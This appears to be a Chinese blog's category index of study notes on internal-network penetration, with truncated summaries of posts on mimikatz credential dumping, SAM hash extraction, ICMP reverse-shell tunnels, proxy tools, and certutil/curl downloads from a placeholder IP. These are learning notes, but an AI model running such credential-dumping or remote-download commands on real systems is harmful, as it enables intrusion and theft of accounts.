随笔分类 - 内网渗透
此类用于学习内网渗透的一些小技巧
摘要:问题引入:winserver2012使用mimikatz是无法抓取明文密码的,要获取明文密码需要修改其注册表。 法一: 在未修改注册表的情况下,使用mimikatz来读取密码: privilege::debug sekurlsa::logonpasswordsmimikatz.exe "privil
阅读全文
摘要:0x00 使用场景 最近遇到个项目需要走公网服务器的流量进行测试,不然waf会拦死,于是用别人的服务器搞了一上午,发现都没法代理出来,按照大哥的说法是,如果别人做的事情只要1天,那你就花3天的时间去做,不可能做不好的,确实管用。走某个网络的流量,只需要自己给自己开个代理即可,下面使用两种代理方式做演
阅读全文
摘要:0x00 实验环境 攻击机:win(192.168.43.10)+kali(192.168.43.243) 受害机: winserver2008(IP:192.168.43.146、192.168.127.157;双网卡,一个公网一个内网) winserver2012(IP:192.168.127.
阅读全文
摘要:攻防演练有看到大哥用这个做代理,今天学习一下 一、安装 https://github.com/ehang-io/nps/releases (下载Linux版本的先试试) 上传至服务器,新建一个nps的文件夹,然后解压: mkdir npstar -xzvf linux_amd64_server.ta
阅读全文
摘要:0x00 实验环境 攻击机:win(192.168.43.131)+kali(192.168.43.217) 受害机:win7(IP:192.168.43.50、192.168.59.133;双网卡,一个公网一个内网)、winserver2008(IP:192.168.59.18;仅主机:一个内网)
阅读全文
摘要:利用ICMP隧道反弹shell (1)下载icmpsh: git clone https://github.com/bdamele/icmpsh.git (2)python安装类库python-impacket apt-get install python-impacket 注:必须下载安装pyth
阅读全文
摘要:文章参考:https://mp.weixin.qq.com/s/cpN91KpBvTHwqqFHAQZDOw 0x01 工具及环境搭建 (1)下载pystinger (Release模块) https://github.com/FunnyWolf/pystinger (2)内网环境: 攻击机:192
阅读全文
摘要:方法一: certutil -urlcache -split -f http://xx.xx.xx.xx/test.zip c:\test.zip (windows远程下载文件至本地,仅需要一个cmd执行的地方) 方法二: curl http://xx.xx.xx.xx/test.zip -o c:
阅读全文
摘要:一、sam特征 (1)全称: security account manager (2)存储位置: C:\windows\system32\config\SAM (3)一旦创建,即产生,一旦销毁,即消失,即使账号重复也将重新生成新的hash 二、提取sam密码 法一:提取命令:(win2K可以直接使用
阅读全文